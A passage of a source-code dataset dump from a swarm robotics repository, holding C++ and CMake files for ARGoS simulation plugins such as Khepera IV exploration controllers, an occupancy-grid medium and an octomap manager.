SReading;\n/****************************************/\n/****************************************/\n\nCKheperaExploration::CKheperaExploration() :\n m_pcWheels(NULL),\n m_pcUltrasoundSensor(NULL),\n m_cAlpha(10.0f),\n m_fDelta(0.5f),\n m_fWheelVelocity(2.5f),\n m_cGoStraightAngleRange(-ToRadians(m_cAlpha),\n ToRadians(m_cAlpha)),\n m_localMap(octomap::OcTree(OCTCELLSIZE)),\n m_localScan(octomap::Pointcloud()),\n m_state(UGV_State::SCAN){}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaExploration::Init(TConfigurationNode& t_node) {\n m_pcWheels = GetActuator<CCI_DifferentialSteeringActuator >(\"differential_steering\");\n m_pcUltrasoundSensor = GetSensor <CCI_KheperaIVUltrasoundSensor >(\"kheperaiv_ultrasound\" );\n m_pcProximity = GetSensor 
<CCI_KheperaIVProximitySensor >(\"kheperaiv_proximity\" );\n m_pcPosition = GetSensor <CCI_PositioningSensor >(\"positioning\");\n\n GetNodeAttributeOrDefault(t_node, \"alpha\", m_cAlpha, m_cAlpha);\n m_cGoStraightAngleRange.Set(-ToRadians(m_cAlpha), ToRadians(m_cAlpha));\n GetNodeAttributeOrDefault(t_node, \"delta\", m_fDelta, m_fDelta);\n GetNodeAttributeOrDefault(t_node, \"velocity\", m_fWheelVelocity, m_fWheelVelocity);\n}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaExploration::ControlStep() {\n switch(m_state) {\n case UGV_State::SCAN:\n break;\n default:\n break;\n }\n}\n\n/****************************************/\n/****************************************/\n\n/*\n * This statement notifies ARGoS of the existence of the controller.\n * It binds the class passed as first argument to the string passed as\n * second argument.\n * The string is then usable in the configuration file to refer to this\n * controller.\n * When ARGoS reads that string in the configuration file, it knows which\n * controller class to instantiate.\n * See also the configuration files for an example of how this is used.\n */\nREGISTER_CONTROLLER(CKheperaExploration, \"kheperaiv_exploration_controller\")" }, { "alpha_fraction": 0.8608695864677429, "alphanum_fraction": 0.8608695864677429, "avg_line_length": 28, "blob_id": "6a9fbf6b1e02cbcd20eff3dea76110863cc08134", "content_id": "c153fa32c28094519ba42114460f87b5c350524a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 115, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/ugv_diffusion_occupancy/plugins/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_subdirectory(simulator)\nadd_subdirectory(robots)\nadd_subdirectory(controllers)\nadd_subdirectory(loop_functions)" }, { "alpha_fraction": 0.7941176295280457, "alphanum_fraction": 
0.7941176295280457, "avg_line_length": 29.22222137451172, "blob_id": "348c87115795e5c7cae057e8c387f781695e25b6", "content_id": "63e375da99603465bc8924c9f75abbee2cd839ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 272, "license_type": "no_license", "max_line_length": 88, "num_lines": 9, "path": "/ugv_diffusion_occupancy/plugins/controllers/kheperaiv_occupancy/CMakeFiles/kheperaiv_occupancy_automoc.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"kheperaiv_occupancy_automoc.cpp\"\n \"CMakeFiles/kheperaiv_occupancy_automoc\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/kheperaiv_occupancy_automoc.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.821561336517334, "alphanum_fraction": 0.8289963006973267, "avg_line_length": 48, "blob_id": "7d88af311854fd921a30d8eaead63971b854ab09", "content_id": "ef162e1a64044eae6ead798ed942975fd6e193f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 538, "license_type": "no_license", "max_line_length": 98, "num_lines": 11, "path": "/ugv_diffusion_occupancy/plugins/controllers/epuck_obstacleavoidance/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_library(epuck_obstacleavoidance SHARED epuck_obstacleavoidance.h epuck_obstacleavoidance.cpp)\ntarget_link_libraries(epuck_obstacleavoidance\n argos3core_simulator\n argos3plugin_simulator_epuck\n argos3plugin_simulator_genericrobot\n argos3plugin_simulator_generic_occupancy)\n\ninstall(TARGETS epuck_obstacleavoidance DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES epuck_obstacleavoidance.h DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 
0.6726694703102112, "alphanum_fraction": 0.6832627058029175, "avg_line_length": 20.477272033691406, "blob_id": "f655dd0d594ecc35d85ab545e06eb4bbe0cb41d4", "content_id": "95d356fada1b9f0d011825a61919595cebf38b01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 944, "license_type": "no_license", "max_line_length": 66, "num_lines": 44, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/control_interface/ci_occupancy_actuator.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef CI_OCCUPANCY_ACTUATOR_H\n#define CI_OCCUPANCY_ACTUATOR_H\n\n#include <argos3/core/control_interface/ci_actuator.h>\n#include <argos3/core/utility/logging/argos_log.h>\n\nusing namespace argos;\n\nclass CCI_OccupancyActuator : public CCI_Actuator{\npublic:\n\n CCI_OccupancyActuator();\n\n inline void SetStrength(const UInt16 un_strength){\n m_unStrength = un_strength;\n }\n\n inline UInt16 GetStrength(const UInt16 un_strength){\n return m_unStrength;\n }\n\n inline void SetLaying(const bool& b_laying){\n bLayingPheromone = b_laying;\n }\n\n inline bool GetLaying() const{\n return bLayingPheromone;\n }\n\n inline virtual void SetOccupancy(Real dist) {\n LOGERR << \"Using the cci set occupancy call\" << std::endl;\n }\n\n #ifdef ARGOS_WITH_LUA\n void CreateLuaState(lua_State* pt_lua_state) override;\n #endif\n\nprotected:\n bool bLayingPheromone;\n UInt16 m_unStrength;\n\n};\n\n#endif" }, { "alpha_fraction": 0.770963728427887, "alphanum_fraction": 0.7784730792045593, "avg_line_length": 24.80645179748535, "blob_id": "3cf5b447e60dbe2a402c7af72ecdab053917abcd", "content_id": "6a9a8f66c0cffd18623ce845ab57fce49efac9e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 799, "license_type": "no_license", "max_line_length": 86, "num_lines": 31, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/occupancy_visualizer/occupancy_visualizer.h", "repo_name": 
"turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCCUPANCY_QTUSER_FUNCTIONS_H\n#define OCCUPANCY_QTUSER_FUNCTIONS_H\n\n#include <argos3/plugins/simulator/visualizations/qt-opengl/qtopengl_user_functions.h>\n#include <plugins/simulator/media/occupancy_medium.h>\n#include <argos3/core/utility/math/quaternion.h>\n#include <argos3/core/utility/math/vector2.h>\n\n//#include <argos3/plugins/loop_functions/diffusion_visualizer/diffusion_visualizer.h>\n\nusing namespace argos;\n\nclass COccupancyQTUserFunctions : public CQTOpenGLUserFunctions {\n\npublic:\n\n COccupancyQTUserFunctions();\n\n void Init(TConfigurationNode& t_tree) override;\n\n void DrawInWorld() override;\n\nprivate:\n bool m_bDrawDiffusion;\n Real m_fGridSize;\n COccupancyMedium& m_cPheraMed;\n std::vector<CVector2> m_cSquarePoints;\n CQuaternion m_cOrientation;\n};\n\n#endif" }, { "alpha_fraction": 0.6343554854393005, "alphanum_fraction": 0.6387733817100525, "avg_line_length": 29.547618865966797, "blob_id": "afdbaa87f0ff35871e0339a71994e5aec4428ab5", "content_id": "652ce853af9cba34c7338d0494d5f2416958bc70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3848, "license_type": "no_license", "max_line_length": 98, "num_lines": 126, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/occupancy_medium.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCCUPANCY_MEDIUM_H\n#define OCCUPANCY_MEDIUM_H\n\n#include <map>\n#include <functional>\n#include <cmath>\n\n#include <argos3/core/utility/math/vector3.h>\n#include <argos3/core/simulator/medium/medium.h>\n#include <argos3/core/utility/datatypes/datatypes.h>\n\nusing namespace argos;\n\n\n// used for PheromoneMap allowing vectors to be indicies\nstruct VectorCompare\n{\n bool operator() (const CVector2& lhs, const CVector2& rhs) const\n {\n if(lhs.GetX() == rhs.GetX()){\n return lhs.GetY() < rhs.GetY();\n }\n return lhs.GetX() < rhs.GetX();\n 
}\n};\n\nclass COccupancyMedium : public CMedium {\n\npublic:\n typedef std::map<CVector2, UInt16, VectorCompare> PheromoneMap;\n\n typedef std::function<void(UInt16&)> PheromoneUpdater;\n\n void Init(TConfigurationNode& t_tree) override;\n\n void PostSpaceInit() override;\n \n void Reset() override;\n \n void Destroy() override;\n \n void Update() override;\n\n\n /**\n * Converts a real position to the cell position, this can be \n * used for inserting elements into m_cPheromoneCells\n * @param c_position The real position.\n * @param b_ceil The coordinates rounds up.\n * @return The cell position.\n */\n CVector2 PositionToCellPosition(const CVector2& c_position) const;\n\n /**\n * Lays pheromone at the given position.\n * Internally PositionToCellPosition will be called, so the real position can be given.\n * @param c_position The position where you want to lay pheromone.\n */\n void SetOccupancy(const CVector2& c_position);\n\n // TODO: use true and false for bool params\n /**\n * Reads the pheromone levels around the given position.\n * Internally PositionToCellPosition will be called, so the real position can be given.\n * @param c_position The position around which to measure pheromone.\n * @param f_range The distance of cells to be returned \n * @param b_circle If enabled, a circle filter is used. 
Not yet implemented.\n * @returned A PheromoneMap of the local pheromone levels, with relative positions.\n */\n PheromoneMap ReadPheromone(const CVector2& c_position, const Real& f_range, \n const bool& b_circle=false) const;\n\n\n /**\n * @return The size of the cells\n */\n inline Real GetCellSize(){\n return m_fCellSize;\n }\n\n inline PheromoneMap GetPheromoneMap(){\n return m_cPheromoneCells;\n }\n\n /**\n * [SetLocalLevels description]\n * @param c_local_levels [description]\n * @param c_cell_key [description]\n * @param c_position [description]\n */\n void SetLocalLevels(COccupancyMedium::PheromoneMap& c_local_levels,\n const CVector2& c_cell_key,\n const CVector2& c_position)const;\n\n /**\n * Converts an real coordinate to a cell coordinate.\n * @param f_original_coordinate The original coordinate.\n * @param b_ceil Indicates that the coordinates should round up.\n * @return The cell coordinate.\n */\n inline Real ToCellDistance(const Real& f_original_coordinate, \n const bool& b_floor = true) const{\n if(b_floor)\n return floor(f_original_coordinate/m_fCellSize);\n return f_original_coordinate/m_fCellSize;\n }\n\n\nprivate:\n\n\n /** The dimension of the occupancy grid cell size */\n Real m_fCellSize;\n\n /** Function to update pheromone levels for a cell value*/\n PheromoneUpdater m_cPheromoneUpdater;\n\n /** \n * Keeps track of the occupancy values at certain positions. 
\n * Do not write to the map directly, first use \n * PositionToCellPosition to get valid cell positions.\n */\n PheromoneMap m_cPheromoneCells;\n};\n\n#endif" }, { "alpha_fraction": 0.7703016400337219, "alphanum_fraction": 0.7726218104362488, "avg_line_length": 27.799999237060547, "blob_id": "e08193247b2d8a588cb50c7f034c8ff3a41529d6", "content_id": "b6a698f7ba3f2cd08dd9448f82261793f7056fcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 431, "license_type": "no_license", "max_line_length": 83, "num_lines": 15, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "set(HEADERS\n occupancy_medium.h)\n\nset(SOURCES\n occupancy_medium.cpp)\n\nadd_library(occupancy_medium SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(occupancy_medium\n argos3core_simulator)\n\ninstall(TARGETS occupancy_medium DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES ${HEADERS} DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.8416289687156677, "alphanum_fraction": 0.8416289687156677, "avg_line_length": 36, "blob_id": "9f68602c6601e4d2918398a15613daa31fa1b1bc", "content_id": "90a7695587d990f7ae02132d2aae92fe57394d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 94, "num_lines": 6, "path": "/README.md", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "# swarm-mqp\nDevelopment of simulation for heterogeneous swarm.\n\nPython Functions:\n\tUsing OpenCV and Numpy for image processing\n\tStuehrmannfunctions.py contain functions for use in image processing and frame transformation" }, { "alpha_fraction": 0.740963876247406, "alphanum_fraction": 0.7469879388809204, 
"avg_line_length": 28.075000762939453, "blob_id": "1b4970623624bbd81b8e3562f885cfc27c7d71c6", "content_id": "b9d8cefb16d6f127533f134e3074a7b86789be49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 69, "num_lines": 40, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/simulator/occupancy_default_actuator.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCCUPANCY_DEFAULT_ACTUATOR_H\n#define OCCUPANCY_DEFAULT_ACTUATOR_H\n\n#include <string>\n#include <map>\n#include <list>\n\n#include <argos3/core/simulator/actuator.h>\n#include <argos3/core/simulator/space/space.h>\n#include <argos3/core/simulator/entity/embodied_entity.h>\n#include <argos3/core/simulator/entity/composable_entity.h>\n#include <argos3/core/utility/math/vector2.h>\n#include \"../control_interface/ci_occupancy_actuator.h\"\n#include <plugins/simulator/media/occupancy_medium.h>\n\nusing namespace argos;\n\nclass COccupancyActuator : public CSimulatedActuator,\n public CCI_OccupancyActuator {\n\npublic:\n void SetRobot(CComposableEntity& c_entity) override;\n void Init(TConfigurationNode& t_tree) override;\n void Update() override;\n void Reset() override;\n void Destroy() override;\n void SetOccupancy(Real distance) override;\n\nprivate:\n\n /** Reference to embodied entity associated with this actuator */\n CEmbodiedEntity* m_pcEmbodiedEntity;\n /** Reference to pheromone medium associated with this actuator */\n COccupancyMedium* m_pCOccupancyMedium;\n\n std::list<CVector2> m_occupancy_list;\n\n};\n\n#endif" }, { "alpha_fraction": 0.5397769808769226, "alphanum_fraction": 0.5482032299041748, "avg_line_length": 30.53125, "blob_id": "2c495b0cbb459345fd4fe9c093eae9704dbfd02b", "content_id": "805664180259c1b64774816f0b115dea0eda0f87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4035, 
"license_type": "no_license", "max_line_length": 95, "num_lines": 128, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/occupancy_medium.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include \"occupancy_medium.h\"\n#include <argos3/core/utility/logging/argos_log.h>\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Init(TConfigurationNode& t_tree){\n CMedium::Init(t_tree);\n\n std::string strDecayOption(\"linear\");\n\n GetNodeAttributeOrDefault(t_tree, \"cell_size\", m_fCellSize, 0.1);\n\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::PostSpaceInit(){\n\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Reset(){\n m_cPheromoneCells.clear();\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Destroy(){\n\n}\n\n/****************************************/\n/****************************************/\n\nCVector2 COccupancyMedium::PositionToCellPosition(const CVector2& c_position) const{\n CVector2 cCellPosition;\n cCellPosition.SetX(ToCellDistance(c_position.GetX()));\n cCellPosition.SetY(ToCellDistance(c_position.GetY()));\n return cCellPosition;\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Update(){\n // for(auto &pair: m_cPheromoneCells){\n // // update pheromone levels using callback chosen by Init\n // m_cPheromoneUpdater(pair.second);\n // // if pheromone level is 0 remove from map to make iteration quicker\n // if(pair.second == 0){\n // m_cPheromoneCells.erase(pair.first);\n // }\n // }\n}\n\n/****************************************/\n/****************************************/\nvoid COccupancyMedium::SetOccupancy(const CVector2& c_position) {\n CVector2 cell_position = 
PositionToCellPosition(c_position);\n m_cPheromoneCells[cell_position] = 1;\n LOG << \"occupancy set at cell position: \" + std::to_string(cell_position.GetX())\n + \", \" + std::to_string(cell_position.GetY()) + \"\\n\"; \n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::SetLocalLevels(COccupancyMedium::PheromoneMap& c_local_levels,\n const CVector2& c_cell_key,\n const CVector2& c_position)const{\n\n COccupancyMedium::PheromoneMap::const_iterator fKeyPair;\n\n // check to see if the cell has any pheromone\n fKeyPair = m_cPheromoneCells.find(c_cell_key);\n if(fKeyPair != m_cPheromoneCells.end()){\n // set the transorm the cordinates to meters and \n // translate it to be releative to the robot position\n CVector2 CLocalPosition = c_cell_key*m_fCellSize - c_position;\n // Set the entry in the local map\n c_local_levels[CLocalPosition] = fKeyPair->second;\n }\n}\n\n/****************************************/\n/****************************************/\n\n\nCOccupancyMedium::PheromoneMap COccupancyMedium::ReadPheromone(const CVector2& c_position, \n const Real& f_range, \n const bool& b_circle)const{\n COccupancyMedium::PheromoneMap cLocalLevels;\n \n // convert from meters to cell values\n //\n const CVector2 cAdjPosition(PositionToCellPosition(c_position));\n const UInt16 fAdjRange(ToCellDistance(f_range));\n \n // get \n const CVector2 cPosOffset(cAdjPosition-PositionToCellPosition(c_position));\n const Real fRangeOffset(fabs(fAdjRange-ToCellDistance(f_range)));\n\n CVector2 cCellKey;\n\n SInt16 nX=0, nXMin=0, nXMax=0, nY=0, nYMin=0, nYMax=0, nZ=0, nZMin=0, nZMax=0;\n\n return cLocalLevels;\n}\n/****************************************/\n/****************************************/\n\nREGISTER_MEDIUM(COccupancyMedium,\n \"occupancy_medium\",\n \"Turner Robbins [[email protected]]\",\n \"0.0\",\n \"Medium that manages an occupancy grid.\",\n \"This medium develops the occupancy grid as determined by 
readings from occupancy_acuator\\n\\n\"\n \"REQUIRED XML CONFIGURATION\\n\\n\"\n \"<pheromone id=\\\"pheromone\\\" />\\n\\n\"\n \"OPTIONAL XML ATTRIBUTES\\n\\n\"\n \"cell_size - The size in meters of the pheromone cells, defaults to .1\\n\",\n \"Under development\"\n);" }, { "alpha_fraction": 0.7869986295700073, "alphanum_fraction": 0.795297384262085, "avg_line_length": 33.42856979370117, "blob_id": "ca6e83f86df72b82e43e006060b3f89e41fbc6b3", "content_id": "858fad01e32307bacefd74358a3e7731afe5a21c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 723, "license_type": "no_license", "max_line_length": 93, "num_lines": 21, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "\nset(HEADERS\n\tsimulator/occupancy_default_actuator.h)\n\nset(SOURCES\n\tcontrol_interface/ci_occupancy_actuator.cpp\n\tsimulator/occupancy_default_actuator.cpp)\n\ninclude_directories(~/swarm-mqp/)\n\nadd_library(argos3plugin_simulator_generic_occupancy SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(argos3plugin_simulator_generic_occupancy\n argos3core_simulator\n occupancy_medium\n )\n\ninstall(TARGETS argos3plugin_simulator_generic_occupancy DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\n#FILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\n#install(FILES ${HEADERS_1} DESTINATION \"include/${relative_dir}/control_interface\")\n#install(FILES ${HEADERS_2} DESTINATION \"include/${relative_dir}/simulator\")" }, { "alpha_fraction": 0.7141608595848083, "alphanum_fraction": 0.7246503233909607, "avg_line_length": 39.875, "blob_id": "654596e26ce7dd3de82312c214b2b9519ec04f59", "content_id": "918ef5dd203eb8e7f339990bdce7ea6d1379c0ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2288, "license_type": "no_license", "max_line_length": 129, "num_lines": 56, "path": 
"/ugv_diffusion_occupancy/plugins/loop_functions/octomap_manager/octomap_manager.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <argos3/core/utility/datatypes/any.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_entity.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n\n#include \"plugins/controllers/kheperaiv_occupancy/kheperaiv_occupancy_controller.h\"\n\n#include \"octomap_manager.h\"\n\nvoid CLoopOctomapManager::Init (TConfigurationNode& t_tree) {\n\tm_KheperaMap = GetSpace().GetEntitiesByType(\"kheperaiv\");\n\tm_OcMap.setClampingThresMin(.1);\n\tm_OcMap.setClampingThresMax(.9);\n\tm_OcMap.setProbHit(.7);\n\tm_OcMap.setProbMiss(.3);\n\t//m_OcMap.setOccupancyThres(0.5);\n\n}\n\nvoid CLoopOctomapManager::insertRay() {\n\tstd::cout << \"\\n----insert ray called!----\" << std::endl;\n}\n\nvoid CLoopOctomapManager::PostStep() {\n\tstd::vector<octomap::point3d> robots;\n\tfor(CSpace::TMapPerType::iterator it = m_KheperaMap.begin(); it != m_KheperaMap.end(); ++it) {\n\t\t/* Get the kheperaController */\n\t\tCKheperaIVEntity& kheperaEntity = *any_cast<CKheperaIVEntity*>(it->second);\n\t\tCKheperaOccupancy& kheperaController = dynamic_cast<CKheperaOccupancy&>(kheperaEntity.GetControllableEntity().GetController());\n\t\toctomap::Pointcloud localScan = kheperaController.getLocalScan();\n\t\t/* 3D representation of sensor origin */\n \t\toctomap::point3d startp = octomap::point3d(kheperaEntity.GetEmbodiedEntity().GetOriginAnchor().Position.GetX(),\n \t\t\t\t\t\t\t\t\t\t\t\t\tkheperaEntity.GetEmbodiedEntity().GetOriginAnchor().Position.GetY(), \n \t\t\t\t\t\t\t\t\t\t\t\t\tkheperaEntity.GetEmbodiedEntity().GetOriginAnchor().Position.GetZ());\n \t\trobots.push_back(startp);\n \t\t/* Update local map by inserting the point cloud*/\n \t\tm_OcMap.insertPointCloud(localScan, startp);\n \t\tkheperaController.clearLocalScan();\n\t}\n\t/* go through robot locations and clear them on the map 
*/\n\tfor(octomap::point3d pos : robots) {\n\t\tfor(Real i = 0.0; i < KHEPERAIV_BASE_RADIUS * 1.1; i += OCTCELLSIZE) {\n\t\t\tfor(Real j = 0.0; j < KHEPERAIV_BASE_RADIUS * 1.1; j += OCTCELLSIZE) {\n\t\t\t\tpoint3d pos (i, j, KHEPERAIV_ULTRASOUND_SENSORS_RING_ELEVATION);\n\t\t\t\tpoint3d neg (-i, -j, KHEPERAIV_ULTRASOUND_SENSORS_RING_ELEVATION);\n \t\tm_OcMap.updateNode(pos, false); // integrate 'free' measurement\n \t\tm_OcMap.updateNode(neg, false);\n\t\t\t}\n\t\t}\n\t}\n}\n\n//CLoopOctomapManager::\n\nREGISTER_LOOP_FUNCTIONS(CLoopOctomapManager, \"octomap_manager\")" }, { "alpha_fraction": 0.5429917573928833, "alphanum_fraction": 0.5541813969612122, "avg_line_length": 35.1489372253418, "blob_id": "824df5443a3914d5ebbd46080a46da706d62ad16", "content_id": "db47346db6010c5e15fe251f3ca2692d9fc81e15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1698, "license_type": "no_license", "max_line_length": 101, "num_lines": 47, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/occupancy_visualizer/occupancy_visualizer.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include \"occupancy_visualizer.h\"\n\n/****************************************/\n/****************************************/\n\nCOccupancyQTUserFunctions::COccupancyQTUserFunctions() :\n m_cPheraMed(CSimulator::GetInstance().GetMedium<COccupancyMedium>(\"occupancy_medium\"))\n {\n // get the grid size and calculate the square corners\n m_fGridSize = m_cPheraMed.GetCellSize();\n m_cSquarePoints.resize(4);\n m_cSquarePoints[1].Set(m_fGridSize,0);\n m_cSquarePoints[2].Set(m_fGridSize,m_fGridSize);\n m_cSquarePoints[3].Set(0,m_fGridSize);\n\n // set the orienation for the squares\n m_cOrientation.FromAngleAxis(CRadians::ZERO, CVector3::Z);\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyQTUserFunctions::Init(TConfigurationNode& t_tree){\n m_bDrawDiffusion = 
false;\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyQTUserFunctions::DrawInWorld() {\n const COccupancyMedium::PheromoneMap& cPheromoneCells = m_cPheraMed.GetPheromoneMap();\n // offset is so the square is not in the same space as the floor \n CVector3 cOffset(0,0,0.1);\n /* Go through all the cells and draw them */\n for(const auto &pair: cPheromoneCells){\n CVector3 grid_3d = CVector3(pair.first.GetX()*m_fGridSize, pair.first.GetY()*m_fGridSize, 1);\n DrawPolygon(grid_3d,\n m_cOrientation, \n m_cSquarePoints,\n CColor(pair.second,0,0));\n }\n}\n\n/****************************************/\n/****************************************/\n\nREGISTER_QTOPENGL_USER_FUNCTIONS(COccupancyQTUserFunctions, \"occupancy_qtuser_functions\")" }, { "alpha_fraction": 0.8062953948974609, "alphanum_fraction": 0.8123486638069153, "avg_line_length": 38.380950927734375, "blob_id": "ad1164236f7e029d8476811a31f1d68bfdb03daf", "content_id": "5cd8db3b24c8df02a07927a80ef0e5718084a6b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 826, "license_type": "no_license", "max_line_length": 118, "num_lines": 21, "path": "/ugv_diffusion_occupancy/plugins/controllers/kheperaiv_occupancy/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "include_directories(${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/)\nset(HEADERS ${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/octomap_manager.h)\n\nadd_library(kheperaiv_occupancy SHARED kheperaiv_occupancy_controller.h kheperaiv_occupancy_controller.cpp ${HEADERS})\n\n\ntarget_link_libraries(kheperaiv_occupancy\n argos3core_simulator\n argos3plugin_simulator_epuck\n argos3plugin_simulator_genericrobot\n argos3plugin_simulator_kheperaiv.so\n argos3plugin_simulator_generic_occupancy\n liboctomap.so\n liboctomath.so\n liboctovis.so\n )\n\ninstall(TARGETS kheperaiv_occupancy 
DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES kheperaiv_occupancy_controller.h DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.8071253299713135, "alphanum_fraction": 0.812039315700531, "avg_line_length": 39.75, "blob_id": "27d2b3644624612e4c21176616bbd2209c564f33", "content_id": "a7ffe461b9ec709c7b9cfc51f769a6f6e959fa3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 814, "license_type": "no_license", "max_line_length": 105, "num_lines": 20, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "include_directories(${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/)\nset(HEADERS ${PROJECT_SOURCE_DIR}/plugins/loop_functions/octomap_manager/octomap_manager.h)\nset(SOURCES kheperaiv_exploration_controller.h kheperaiv_exploration_controller.cpp)\n\nadd_library(kheperaiv_exploration SHARED ${SOURCES} ${HEADERS})\n\n\ntarget_link_libraries(kheperaiv_exploration\n argos3core_simulator\n argos3plugin_simulator_epuck\n argos3plugin_simulator_genericrobot\n argos3plugin_simulator_kheperaiv.so\n liboctomap.so\n liboctomath.so\n liboctovis.so)\n\ninstall(TARGETS kheperaiv_exploration DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES kheperaiv_occupancy_controller.h DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.8630136847496033, "alphanum_fraction": 0.8630136847496033, "avg_line_length": 36, "blob_id": "d3f43615c908095a6991b60775ec438e01eb0df1", "content_id": "0a8c93ecce7cc2c1871d4fd6e8ed007c65ed2a6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 73, "license_type": "no_license", 
